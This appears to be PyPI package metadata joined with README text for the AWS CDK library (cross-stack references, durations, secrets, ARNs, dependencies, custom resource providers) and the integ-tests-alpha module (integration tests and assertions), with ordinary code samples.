## Accessing resources in a different stack You can access resources in a different stack, as long as they are in the same account and AWS Region (see [next section](#accessing-resources-in-a-different-stack-and-region) for an exception). The following example defines the stack `stack1`, which defines an Amazon S3 bucket. Then it defines a second stack, `stack2`, which takes the bucket from stack1 as a constructor property. ```python prod = {"account": "123456789012", "region": "us-east-1"} stack1 = StackThatProvidesABucket(app, "Stack1", env=prod) # stack2 will take a property { bucket: IBucket } stack2 = StackThatExpectsABucket(app, "Stack2", bucket=stack1.bucket, env=prod ) ``` If the AWS CDK determines that the resource is in the same account and Region, but in a different stack, it automatically synthesizes AWS CloudFormation [Exports](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-stack-exports.html) in the producing stack and an [Fn::ImportValue](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/intrinsic-function-reference-importvalue.html) in the consuming stack to transfer that information from one stack to the other. ## Accessing resources in a different stack and region > **This feature is currently experimental** You can enable the Stack property `crossRegionReferences` in order to access resources in a different stack *and* region. With this feature flag enabled it is possible to do something like creating a CloudFront distribution in `us-east-2` and an ACM certificate in `us-east-1`. 
```python from aws_cdk import Environment stack1 = Stack(app, "Stack1", env=Environment( region="us-east-1" ), cross_region_references=True ) cert = acm.Certificate(stack1, "Cert", domain_name="*.example.com", validation=acm.CertificateValidation.from_dns(route53.PublicHostedZone.from_hosted_zone_id(stack1, "Zone", "Z0329774B51CGXTDQV3X")) ) stack2 = Stack(app, "Stack2", env=Environment( region="us-east-2" ), cross_region_references=True ) cloudfront.Distribution(stack2, "Distribution", default_behavior=cloudfront.BehaviorOptions( origin=origins.HttpOrigin("example.com") ), domain_names=["dev.example.com"], certificate=cert ) ``` When the AWS CDK determines that the resource is in a different stack *and* is in a different region, it will "export" the value by creating a custom resource in the producing stack which creates SSM Parameters in the consuming region for each exported value. The parameters will be created with the name '/cdk/exports/${consumingStackName}/${export-name}'. In order to "import" the exports into the consuming stack an [SSM Dynamic reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/dynamic-references.html#dynamic-references-ssm) is used to reference the SSM parameter which was created. In order to mimic strong references, a Custom Resource is also created in the consuming stack which marks the SSM parameters as being "imported". When a parameter has been successfully imported, the producing stack cannot update the value. > [!NOTE] > As a consequence of this feature being built on a Custom Resource, we are restricted to a > CloudFormation response body size limitation of [4096 bytes](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/crpg-ref-responses.html). > To prevent deployment errors related to the Custom Resource Provider response body being too > large, we recommend limiting the use of nested stacks and minimizing the length of stack names.
> Doing this will prevent SSM parameter names from becoming too long which will reduce the size of the > response body. See the [adr](https://github.com/aws/aws-cdk/blob/main/packages/aws-cdk-lib/core/adr/cross-region-stack-references.md) for more details on this feature. ### Removing automatic cross-stack references The automatic references created by CDK when you use resources across stacks are convenient, but may block your deployments if you want to remove the resources that are referenced in this way. You will see an error like: ```text Export Stack1:ExportsOutputFnGetAtt-****** cannot be deleted as it is in use by Stack1 ``` Let's say there is a Bucket in the `stack1`, and the `stack2` references its `bucket.bucketName`. You now want to remove the bucket and run into the error above. It's not safe to remove `stack1.bucket` while `stack2` is still using it, so unblocking yourself from this is a two-step process. This is how it works: DEPLOYMENT 1: break the relationship * Make sure `stack2` no longer references `bucket.bucketName` (maybe the consumer stack now uses its own bucket, or it writes to an AWS DynamoDB table, or maybe you just remove the Lambda Function altogether). * In the `stack1` class, call `this.exportValue(this.bucket.bucketName)`. This will make sure the CloudFormation Export continues to exist while the relationship between the two stacks is being broken. * Deploy (this will effectively only change the `stack2`, but it's safe to deploy both). DEPLOYMENT 2: remove the resource * You are now free to remove the `bucket` resource from `stack1`. * Don't forget to remove the `exportValue()` call as well. * Deploy again (this time only the `stack1` will be changed -- the bucket will be deleted). 
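The SSM parameter naming scheme used by cross-region exports, described earlier, can be sketched with a small helper. The function name is hypothetical and not part of the CDK API:

```python
def cross_region_export_parameter_name(consuming_stack_name, export_name):
    """Build the SSM parameter name used for a cross-region export,
    following the '/cdk/exports/${consumingStackName}/${export-name}'
    pattern from the documentation (toy helper, not the CDK API)."""
    return f"/cdk/exports/{consuming_stack_name}/{export_name}"


name = cross_region_export_parameter_name("Stack2", "CertArnExport")
print(name)  # /cdk/exports/Stack2/CertArnExport

# Long stack or export names make these parameter names longer, which grows
# the Custom Resource response body subject to the 4096-byte limit noted above.
```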
## Durations To make specifications of time intervals unambiguous, a single class called `Duration` is used throughout the AWS Construct Library by all constructs that take a time interval as a parameter (be it for a timeout, a rate, or something else). An instance of Duration is constructed by using one of the static factory methods on it: ```python Duration.seconds(300) # 5 minutes Duration.minutes(5) # 5 minutes Duration.hours(1) # 1 hour Duration.days(7) # 7 days Duration.parse("PT5M") ``` Durations can be added together or subtracted: ```python Duration.minutes(1).plus(Duration.seconds(60)) # 2 minutes Duration.minutes(5).minus(Duration.seconds(10)) ``` ## Size (Digital Information Quantity) To make specification of digital storage quantities unambiguous, a class called `Size` is available. An instance of `Size` is initialized through one of its static factory methods: ```python Size.kibibytes(200) # 200 KiB Size.mebibytes(5) # 5 MiB Size.gibibytes(40) # 40 GiB Size.tebibytes(200) # 200 TiB Size.pebibytes(3) ``` Instances of `Size` created with one of the units can be converted into others. By default, conversion to a higher unit will fail if the conversion does not produce a whole number. This can be overridden by unsetting the `integral` property. ```python Size.mebibytes(2).to_kibibytes() # yields 2048 Size.kibibytes(2050).to_mebibytes(rounding=SizeRoundingBehavior.FLOOR) ``` ## Secrets To help avoid accidental storage of secrets as plain text, we use the `SecretValue` type to represent secrets. Any construct that takes a value that should be a secret (such as a password or an access key) will take a parameter of type `SecretValue`.
The best practice is to store secrets in AWS Secrets Manager and reference them using `SecretValue.secretsManager`:

```python
secret = SecretValue.secrets_manager("secretId",
    json_field="password",  # optional: key of a JSON field to retrieve (defaults to all content)
    version_id="id",        # optional: id of the version (default AWSCURRENT)
    version_stage="stage"
)
```

Using AWS Secrets Manager is the recommended way to reference secrets in a CDK app.

`SecretValue` also supports the following secret sources:

* `SecretValue.unsafePlainText(secret)`: stores the secret as plain text in your app and the resulting template (not recommended).
* `SecretValue.secretsManager(secret)`: refers to a secret stored in Secrets Manager.
* `SecretValue.ssmSecure(param, version)`: refers to a secret stored as a SecureString in the SSM Parameter Store. If you don't specify the exact version, AWS CloudFormation uses the latest version of the parameter.
* `SecretValue.cfnParameter(param)`: refers to a secret passed through a CloudFormation parameter (must have `NoEcho: true`).
* `SecretValue.cfnDynamicReference(dynref)`: refers to a secret described by a CloudFormation dynamic reference (used by `ssmSecure` and `secretsManager`).
* `SecretValue.resourceAttribute(attr)`: refers to a secret returned from a CloudFormation resource creation.

`SecretValue`s should only be passed to constructs that accept properties of type `SecretValue`. These constructs are written to ensure your secrets will not be exposed where they shouldn't be. If you try to use a `SecretValue` in a different location, an error about unsafe secret usage will be thrown at synthesis time.

If you rotate the secret's value in Secrets Manager, you must also change at least one property on the resource where you are using the secret, to force CloudFormation to re-read the secret.

`SecretValue.ssmSecure()` is only supported for a limited set of resources.
[Click here for a list of supported resources and properties](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/dynamic-references.html#template-parameters-dynamic-patterns-resources).

`SecretValue.cfnDynamicReferenceKey` takes the same parameters as `SecretValue.secretsManager` and returns a key which can be used within a [dynamic reference](#dynamic-references) to dynamically load a secret from AWS Secrets Manager.

## ARN manipulation

Sometimes you will need to put together or pick apart Amazon Resource Names (ARNs). The functions `stack.formatArn()` and `stack.splitArn()` exist for this purpose.

`formatArn()` can be used to build an ARN from components. It will automatically use the region and account of the stack you're calling it on:

```python
# stack: Stack

# Builds "arn:<PARTITION>:lambda:<REGION>:<ACCOUNT>:function:MyFunction"
stack.format_arn(
    service="lambda",
    resource="function",
    arn_format=ArnFormat.COLON_RESOURCE_NAME,
    resource_name="MyFunction"
)
```

`splitArn()` can be used to get a single component from an ARN. `splitArn()` will correctly deal with both literal ARNs and deploy-time values (tokens), but in case of a deploy-time value be aware that the result will be another deploy-time value which cannot be inspected in the CDK application.

```python
# stack: Stack

# Extracts the function name out of an AWS Lambda Function ARN
arn_components = stack.split_arn(arn, ArnFormat.COLON_RESOURCE_NAME)
function_name = arn_components.resource_name
```

Note that the format of the resource separator depends on the service and may be any of the values supported by `ArnFormat`. When dealing with these functions, it is important to know the format of the ARN you are dealing with. For an exhaustive list of ARN formats used in AWS, see [AWS ARNs and Namespaces](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html) in the AWS General Reference.
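To see why the format matters, here is a plain-Python sketch (not part of the CDK API) that splits the same Lambda ARN by hand, assuming the colon-resource-name layout where the sixth colon-separated field is the resource type and the seventh is the resource name:

```python
def split_colon_resource_name(arn: str) -> dict:
    """Split an ARN using the arn:partition:service:region:account:restype:resname layout."""
    # Split on at most 6 colons so a resource name containing ":" stays intact
    parts = arn.split(":", 6)
    partition, service, region, account, resource, resource_name = parts[1:7]
    return {
        "partition": partition,
        "service": service,
        "region": region,
        "account": account,
        "resource": resource,           # e.g. "function"
        "resource_name": resource_name  # e.g. "MyFunction"
    }

components = split_colon_resource_name(
    "arn:aws:lambda:us-east-1:123456789012:function:MyFunction"
)
print(components["resource_name"])  # MyFunction
```

An S3 object ARN (`arn:aws:s3:::bucket/key`), by contrast, has no colon before the resource name, which is why `splitArn()` needs to be told which `ArnFormat` to expect.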
Some L1 constructs also have an auto-generated static `arnFor<ResourceName>()` method that can be used to generate ARNs for resources of that type. For example, `sns.Topic.arnForTopic(topic)` can be used to generate an ARN for a given topic. Note that the parameter to this method is of type `ITopicRef`, which means that it can be used with both `Topic` (L2) and `CfnTopic` (L1) constructs.

## Dependencies

### Construct Dependencies

Sometimes AWS resources depend on other resources, and the creation of one resource must be completed before the next one can be started. In general, CloudFormation will correctly infer the dependency relationship between resources based on the property values that are used. In the cases where it doesn't, the AWS Construct Library will add the dependency relationship for you.

If you need to add an ordering dependency that is not automatically inferred, you do so by adding a dependency relationship using `constructA.node.addDependency(constructB)`. This will add a dependency relationship between all resources in the scope of `constructA` and all resources in the scope of `constructB`.

If you want a single object to represent a set of constructs that are not necessarily in the same scope, you can use a `DependencyGroup`. The following creates a single object that represents a dependency on two constructs, `constructB` and `constructC`:

```python
# Declare the dependable object
b_and_c = DependencyGroup()
b_and_c.add(construct_b)
b_and_c.add(construct_c)

# Take the dependency
construct_a.node.add_dependency(b_and_c)
```

### Stack Dependencies

Two different stack instances can have a dependency on one another. This happens when a resource from one stack is referenced in another stack. In that case, CDK records the cross-stack referencing of resources, automatically produces the right CloudFormation primitives, and adds a dependency between the two stacks.
You can also manually add a dependency between two stacks by using the `stackA.addDependency(stackB)` method. A stack dependency has the following implications:

* Cyclic dependencies are not allowed, so if `stackA` is using resources from `stackB`, the reverse is not possible anymore.
* Stacks with dependencies between them are treated specially by the CDK toolkit:
  * If `stackA` depends on `stackB`, running `cdk deploy stackA` will also automatically deploy `stackB`.
  * `stackB`'s deployment will be performed *before* `stackA`'s deployment.

### CfnResource Dependencies

To make declaring dependencies between `CfnResource` objects easier, you can declare dependencies from one `CfnResource` object on another by using the `cfnResource1.addDependency(cfnResource2)` method. This method will work for resources both within the same stack and across stacks as it detects the relative location of the two resources and adds the dependency either to the resource or between the relevant stacks, as appropriate.

If more complex logic is needed, you can similarly remove, replace, or view dependencies between `CfnResource` objects with the `CfnResource` `removeDependency`, `replaceDependency`, and `obtainDependencies` methods, respectively.

## Custom Resources

Custom Resources are CloudFormation resources that are implemented by arbitrary user code. They can do arbitrary lookups or modifications during a CloudFormation deployment.

Custom resources are backed by *custom resource providers*. Commonly, these are Lambda Functions that are deployed in the same deployment as the one that defines the custom resource itself, but they can also be backed by Lambda Functions deployed previously, or code responding to SNS Topic events running on EC2 instances in a completely different account. For more information on custom resource providers, see the next section.

Once you have a provider, each definition of a `CustomResource` construct represents one invocation.
A single provider can be used for the implementation of arbitrarily many custom resource definitions. A single definition looks like this:

```python
CustomResource(self, "MyMagicalResource",
    resource_type="Custom::MyCustomResource",  # must start with 'Custom::'

    # the resource properties
    # properties like serviceToken or serviceTimeout are added to the resource
    # properties automatically; avoid key names similar to these, or you risk
    # overwriting those values
    properties={
        "Property1": "foo",
        "Property2": "bar"
    },

    # the ARN of the provider (SNS/Lambda) which handles
    # CREATE, UPDATE or DELETE events for this resource type
    # see next section for details
    service_token="ARN",

    # the maximum time, in seconds, that can elapse before a custom resource operation times out
    service_timeout=Duration.seconds(60)
)
```

### Custom Resource Providers

Custom resources are backed by a **custom resource provider** which can be implemented in one of the following ways. The following table compares the various provider types (ordered from low-level to high-level):

| Provider | Compute Type | Error Handling | Submit to CloudFormation | Max Timeout | Language | Footprint |
| -------------------------------------------------------------------- | :----------: | :------------: | :----------------------: | :-------------: | :------: | :-------: |
| [sns.Topic](#amazon-sns-topic) | Self-managed | Manual | Manual | Unlimited | Any | Depends |
| [lambda.Function](#aws-lambda-function) | AWS Lambda | Manual | Manual | 15min | Any | Small |
| [core.CustomResourceProvider](#the-corecustomresourceprovider-class) | AWS Lambda | Auto | Auto | 15min | Node.js | Small |
| [custom-resources.Provider](#the-custom-resource-provider-framework) | AWS Lambda | Auto | Auto | Unlimited Async | Any | Large |

Legend:

* **Compute type**: which type of compute can be used to execute the handler.
* **Error Handling**: whether errors thrown by handler code are automatically trapped and a FAILED response is submitted to CloudFormation. If this is "Manual", developers must take care of trapping errors. Otherwise, events could cause stacks to hang.
* **Submit to CloudFormation**: whether the framework takes care of submitting SUCCESS/FAILED responses to CloudFormation through the event's response URL.
* **Max Timeout**: maximum allowed/possible timeout.
* **Language**: which programming languages can be used to implement handlers.
* **Footprint**: how many resources are used by the provider framework itself.

#### A note about singletons

When defining resources for a custom resource provider, you will likely want to define them as a *stack singleton*, so that only a single instance of the provider is created in your stack, to be used by all custom resources of that type.

Here is a basic pattern for defining stack singletons in the CDK. The following example ensures that only a single SNS topic is defined:

```python
def get_or_create(self, scope):
    stack = Stack.of(scope)
    uniqueid = "GloballyUniqueIdForSingleton"  # For example, a UUID from `uuidgen`
    existing = stack.node.try_find_child(uniqueid)
    if existing:
        return existing
    return sns.Topic(stack, uniqueid)
```

#### Amazon SNS Topic

Every time a resource event occurs (CREATE/UPDATE/DELETE), an SNS notification is sent to the SNS topic. Users must process these notifications (e.g. through a fleet of worker hosts) and submit success/failure responses to the CloudFormation service.

> You only need to use this type of provider if your custom resource cannot run on AWS Lambda, for reasons other than the 15
> minute timeout. If you are considering using this type of provider because you want to write a custom resource provider that may need
> to wait for more than 15 minutes for the API calls to stabilize, have a look at the [`custom-resources`](#the-custom-resource-provider-framework) module first.
>
> Refer to the [CloudFormation Custom Resource documentation](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-custom-resources.html) for information on the contract your custom resource needs to adhere to.

Set `serviceToken` to `topic.topicArn` in order to use this provider:

```python
topic = sns.Topic(self, "MyProvider")

CustomResource(self, "MyResource",
    service_token=topic.topic_arn
)
```

#### AWS Lambda Function

An AWS Lambda function is called *directly* by CloudFormation for all resource events. The handler must take care of explicitly submitting a success/failure response to the CloudFormation service and handle various error cases.

> **We do not recommend you use this provider type.** The CDK has wrappers around Lambda Functions that make them easier to work with.
>
> If you do want to use this provider, refer to the [CloudFormation Custom Resource documentation](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-custom-resources.html) for information on the contract your custom resource needs to adhere to.

Set `serviceToken` to `lambda.functionArn` to use this provider:

```python
fn = lambda_.SingletonFunction(self, "MyProvider", function_props)

CustomResource(self, "MyResource",
    service_token=fn.function_arn
)
```

#### The `core.CustomResourceProvider` class

The class [`@aws-cdk/core.CustomResourceProvider`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_core.CustomResourceProvider.html) offers a basic low-level framework designed to implement simple and slim custom resource providers. It currently only supports Node.js-based user handlers, represents permissions as raw JSON blobs instead of `iam.PolicyStatement` objects, and it does not have support for asynchronous waiting (the handler cannot exceed the 15min Lambda timeout). The `CustomResourceProviderRuntime` supports the runtimes `nodejs12.x`, `nodejs14.x`, `nodejs16.x`, and `nodejs18.x`.
> **As an application builder, we do not recommend you use this provider type.** This provider exists purely for custom resources that are part of the AWS Construct Library.
>
> The [`custom-resources`](#the-custom-resource-provider-framework) provider is more convenient to work with and more fully-featured.

The provider has a built-in singleton method which uses the resource type as a stack-unique identifier and returns the service token:

```python
service_token = CustomResourceProvider.get_or_create(self, "Custom::MyCustomResourceType",
    code_directory=f"{__dirname}/my-handler",
    runtime=CustomResourceProviderRuntime.NODEJS_18_X,
    description="Lambda function created by the custom resource provider"
)

CustomResource(self, "MyResource",
    resource_type="Custom::MyCustomResourceType",
    service_token=service_token
)
```

The directory (`my-handler` in the above example) must include an `index.js` file. It cannot import external dependencies or files outside this directory. It must export an async function named `handler`. This function accepts the CloudFormation resource event object and returns an object with the following structure:

```js
exports.handler = async function(event) {
  const id = event.PhysicalResourceId; // only for "Update" and "Delete"
  const props = event.ResourceProperties;
  const oldProps = event.OldResourceProperties; // only for "Update"s

  switch (event.RequestType) {
    case "Create":
      // ...
    case "Update":
      // ...

      // if an error is thrown, a FAILED response will be submitted to CFN
      throw new Error('Failed!');

    case "Delete":
      // ...
  }

  return {
    // (optional) the value resolved from `resource.ref`
    // defaults to "event.PhysicalResourceId" or "event.RequestId"
    PhysicalResourceId: "REF",

    // (optional) calling `resource.getAtt("Att1")` on the custom resource in the CDK app
    // will return the value "BAR".
    Data: {
      Att1: "BAR",
      Att2: "BAZ"
    },

    // (optional) user-visible message
    Reason: "User-visible message",

    // (optional) hides values from the console
    NoEcho: true
  };
}
```

Here is a complete example of a custom resource that sums two numbers:

`sum-handler/index.js`:

```js
exports.handler = async (e) => {
  return {
    Data: {
      Result: e.ResourceProperties.lhs + e.ResourceProperties.rhs,
    },
  };
};
```

`sum.ts`:

```python
from constructs import Construct
from aws_cdk import CustomResource, CustomResourceProvider, CustomResourceProviderRuntime, Token

class Sum(Construct):
    def __init__(self, scope, id, *, lhs, rhs):
        super().__init__(scope, id)

        resource_type = "Custom::Sum"
        service_token = CustomResourceProvider.get_or_create(self, resource_type,
            code_directory=f"{__dirname}/sum-handler",
            runtime=CustomResourceProviderRuntime.NODEJS_18_X
        )

        resource = CustomResource(self, "Resource",
            resource_type=resource_type,
            service_token=service_token,
            properties={
                "lhs": lhs,
                "rhs": rhs
            }
        )

        self.result = Token.as_number(resource.get_att("Result"))
```

Usage will look like this:

```python
sum = Sum(self, "MySum", lhs=40, rhs=2)
CfnOutput(self, "Result", value=Token.as_string(sum.result))
```

To access the ARN of the provider's AWS Lambda function role, use the `getOrCreateProvider()` built-in singleton method:

```python
provider = CustomResourceProvider.get_or_create_provider(self, "Custom::MyCustomResourceType",
    code_directory=f"{__dirname}/my-handler",
    runtime=CustomResourceProviderRuntime.NODEJS_18_X
)

role_arn = provider.role_arn
```

This role ARN can then be used in resource-based IAM policies.
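For instance, a resource-based policy statement could name the provider's role ARN as its principal. The sketch below shows such a statement as a plain Python dict; the role ARN, bucket, and account are illustrative, not values produced by the CDK:

```python
# Hypothetical role ARN, as it might be returned by provider.role_arn at deploy time
role_arn = "arn:aws:iam::123456789012:role/MyProviderRole"

# A bucket-policy style statement granting that role read access to objects
statement = {
    "Effect": "Allow",
    "Principal": {"AWS": role_arn},
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::my-bucket/*",
}
```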
To add IAM policy statements to this role, use `addToRolePolicy()`:

```python
provider = CustomResourceProvider.get_or_create_provider(self, "Custom::MyCustomResourceType",
    code_directory=f"{__dirname}/my-handler",
    runtime=CustomResourceProviderRuntime.NODEJS_18_X
)

provider.add_to_role_policy({
    "Effect": "Allow",
    "Action": "s3:GetObject",
    "Resource": "*"
})
```

Note that `addToRolePolicy()` uses direct IAM JSON policy blobs, *not* a `iam.PolicyStatement` object like you will see in the rest of the CDK.

#### The Custom Resource Provider Framework

The [`@aws-cdk/custom-resources`](https://docs.aws.amazon.com/cdk/api/latest/docs/custom-resources-readme.html) module includes an advanced framework for implementing custom resource providers.

Handlers are implemented as AWS Lambda functions, which means that they can be implemented in any Lambda-supported runtime. Furthermore, this provider has an asynchronous mode, which means that users can provide an `isComplete` lambda function which is called periodically until the operation is complete. This allows implementing providers that can take up to two hours to stabilize.

Set `serviceToken` to `provider.serviceToken` to use this type of provider:

```python
provider = customresources.Provider(self, "MyProvider",
    on_event_handler=on_event_handler,
    is_complete_handler=is_complete_handler
)

CustomResource(self, "MyResource",
    service_token=provider.service_token
)
```

See the [documentation](https://docs.aws.amazon.com/cdk/api/latest/docs/aws-cdk-lib.custom_resources-readme.html) for more details.

## AWS CloudFormation features

A CDK stack synthesizes to an AWS CloudFormation Template. This section explains how this module allows users to access low-level CloudFormation features when needed.
### Stack Outputs CloudFormation [stack outputs](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/outputs-section-structure.html) and exports are created using the `CfnOutput` class: ```python CfnOutput(self, "OutputName", value=my_bucket.bucket_name, description="The name of an S3 bucket", # Optional
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk.asset-awscli-v1==2.2.263", "aws-cdk.asset-node-proxy-agent-v6<3.0.0,>=2.1.0", "aws-cdk.cloud-assembly-schema<51.0.0,>=50.3.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:24.267050
aws_cdk_lib-2.239.0.tar.gz
47,594,912
e3/f8/851c18653bf6806877f5c942df7149c1d4f118063106b3c99c083d124da9/aws_cdk_lib-2.239.0.tar.gz
source
sdist
null
false
d4a5b277c727de426462cfa796a9c109
b5637f961e05b0d9ce28da2d759d605e23f4679f2cd0d1262efe3c32986d81f3
e3f8851c18653bf6806877f5c942df7149c1d4f118063106b3c99c083d124da9
null
[]
74,953
2.1
aws-cdk.integ-tests-alpha
2.239.0a0
CDK Integration Testing Constructs
# integ-tests

<!--BEGIN STABILITY BANNER-->

---

![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge)

> The APIs of higher level constructs in this module are experimental and under active development.
> They are subject to non-backward compatible changes or removal in any future version. These are
> not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be
> announced in the release notes. This means that while you may use them, you may need to update
> your source code when upgrading to a newer version of this package.

---

<!--END STABILITY BANNER-->

## Overview

This library is meant to be used in combination with the [integ-runner](https://github.com/aws/aws-cdk-cli/tree/main/packages/%40aws-cdk/integ-runner) CLI to enable users to write and execute integration tests for AWS CDK Constructs.

An integration test should be defined as a CDK application, and there should be a 1:1 relationship between an integration test and a CDK application.

So for example, in order to create an integration test called `my-function` we would need to create a file to contain our integration test application.

*test/integ.my-function.ts*

```python
app = App()
stack = Stack()
lambda_.Function(stack, "MyFunction",
    runtime=lambda_.Runtime.NODEJS_LATEST,
    handler="index.handler",
    code=lambda_.Code.from_asset(path.join(__dirname, "lambda-handler"))
)
```

This is a self-contained CDK application which we could deploy by running

```bash
cdk deploy --app 'node test/integ.my-function.js'
```

In order to turn this into an integration test, all that is needed is to use the `IntegTest` construct.

```python
# app: App
# stack: Stack

IntegTest(app, "Integ", test_cases=[stack])
```

You will notice that the `stack` is registered to the `IntegTest` as a test case. Each integration test can contain multiple test cases, which are just instances of a stack.
See the [Usage](#usage) section for more details.

## Usage

### IntegTest

Suppose you have a simple stack that only encapsulates a Lambda function with a certain handler:

```python
class StackUnderTest(Stack):
    def __init__(self, scope, id, *, architecture=None, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None):
        super().__init__(scope, id, architecture=architecture, description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors)

        lambda_.Function(self, "Handler",
            runtime=lambda_.Runtime.NODEJS_LATEST,
            handler="index.handler",
            code=lambda_.Code.from_asset(path.join(__dirname, "lambda-handler")),
            architecture=architecture
        )
```

You may want to test this stack under different conditions. For example, we want this stack to be deployed correctly, regardless of the architecture we choose for the Lambda function. In particular, it should work for both `ARM_64` and `X86_64`.
So you can create an `IntegTestCase` that exercises both scenarios:

```python
class StackUnderTest(Stack):
    def __init__(self, scope, id, *, architecture=None, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None):
        super().__init__(scope, id, architecture=architecture, description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors)

        lambda_.Function(self, "Handler",
            runtime=lambda_.Runtime.NODEJS_LATEST,
            handler="index.handler",
            code=lambda_.Code.from_asset(path.join(__dirname, "lambda-handler")),
            architecture=architecture
        )

# Beginning of the test suite
app = App()

IntegTest(app, "DifferentArchitectures",
    test_cases=[
        StackUnderTest(app, "Stack1",
            architecture=lambda_.Architecture.ARM_64
        ),
        StackUnderTest(app, "Stack2",
            architecture=lambda_.Architecture.X86_64
        )
    ]
)
```

This is all the instruction you need for the integration test runner to know which stacks to synthesize, deploy and destroy. But you may also need to customize the behavior of the runner by changing its parameters.
For example:

```python
from aws_cdk.cloud_assembly_schema import CdkCommands, DeployCommand, DeployOptions, DestroyCommand, DestroyOptions

app = App()

stack_under_test = Stack(app, "StackUnderTest")

stack = Stack(app, "stack")

test_case = IntegTest(app, "CustomizedDeploymentWorkflow",
    test_cases=[stack_under_test],
    diff_assets=True,
    stack_update_workflow=True,
    cdk_command_options=CdkCommands(
        deploy=DeployCommand(
            args=DeployOptions(
                require_approval=RequireApproval.NEVER,
                json=True
            )
        ),
        destroy=DestroyCommand(
            args=DestroyOptions(
                force=True
            )
        )
    )
)
```

### IntegTestCaseStack

In the majority of cases an integration test will contain a single `IntegTestCase`. By default when you create an `IntegTest` an `IntegTestCase` is created for you and all of your test cases are registered to this `IntegTestCase`. The `IntegTestCase` and `IntegTestCaseStack` constructs are only needed when it is necessary to define different options for individual test cases.

For example, you might want to have one test case where `diffAssets` is enabled.

```python
# app: App
# stack_under_test: Stack

test_case_with_assets = IntegTestCaseStack(app, "TestCaseAssets",
    diff_assets=True
)

IntegTest(app, "Integ", test_cases=[stack_under_test, test_case_with_assets])
```

## Assertions

This library also provides a utility to make assertions against the infrastructure that the integration test deploys.

There are two main scenarios in which assertions are created.

* Part of an integration test using `integ-runner`

  In this case you would create an integration test using the `IntegTest` construct and then make assertions using the `assert` property. You should **not** utilize the assertion constructs directly, but should instead use the methods on `IntegTest.assertions`.

  ```python
  # app: App
  # stack: Stack

  integ = IntegTest(app, "Integ", test_cases=[stack])
  integ.assertions.aws_api_call("S3", "getObject")
  ```

By default an assertions stack is automatically generated for you.
You may however provide your own stack to use.

```python
# app: App
# stack: Stack
# assertion_stack: Stack

integ = IntegTest(app, "Integ", test_cases=[stack], assertion_stack=assertion_stack)
integ.assertions.aws_api_call("S3", "getObject")
```

* Part of a normal CDK deployment

  In this case you may be using assertions as part of a normal CDK deployment in order to make an assertion on the infrastructure before the deployment is considered successful. In this case you can utilize the assertions constructs directly.

  ```python
  # my_app_stack: Stack

  AwsApiCall(my_app_stack, "GetObject",
      service="S3",
      api="getObject"
  )
  ```

### DeployAssert

Assertions are created by using the `DeployAssert` construct. This construct creates its own `Stack` separate from any stacks that you create as part of your integration tests. This `Stack` is treated differently from other stacks by the `integ-runner` tool. For example, this stack will not be diffed by the `integ-runner`.

`DeployAssert` also provides utilities to register your own assertions.

```python
# my_custom_resource: CustomResource
# stack: Stack
# app: App

integ = IntegTest(app, "Integ", test_cases=[stack])
integ.assertions.expect("CustomAssertion",
    ExpectedResult.object_like({"foo": "bar"}),
    ActualResult.from_custom_resource(my_custom_resource, "data"))
```

In the above example an assertion is created that will trigger a user defined `CustomResource` and assert that the `data` attribute is equal to `{ foo: 'bar' }`.

### API Calls

A common method to retrieve the "actual" results to compare with what is expected is to make an API call to receive some data. This library does this by utilizing CloudFormation custom resources, which means that CloudFormation will call out to a Lambda Function which will make the API call.

#### HttpApiCall

Using the `HttpApiCall` will use the [node-fetch](https://github.com/node-fetch/node-fetch) JavaScript library to make the HTTP call.
This can be done by using the class directly (in the case of a normal deployment):

```python
# stack: Stack

HttpApiCall(stack, "MyAssertion",
    url="https://example-api.com/abc"
)
```

Or by using the `httpApiCall` method on `DeployAssert` (when writing integration tests):

```python
# app: App
# stack: Stack

integ = IntegTest(app, "Integ",
    test_cases=[stack]
)
integ.assertions.http_api_call("https://example-api.com/abc")
```

#### AwsApiCall

Using the `AwsApiCall` construct will use the AWS JavaScript SDK to make the API call. This can be done by using the class directly (in the case of a normal deployment):

```python
# stack: Stack

AwsApiCall(stack, "MyAssertion",
    service="SQS",
    api="receiveMessage",
    parameters={
        "QueueUrl": "url"
    }
)
```

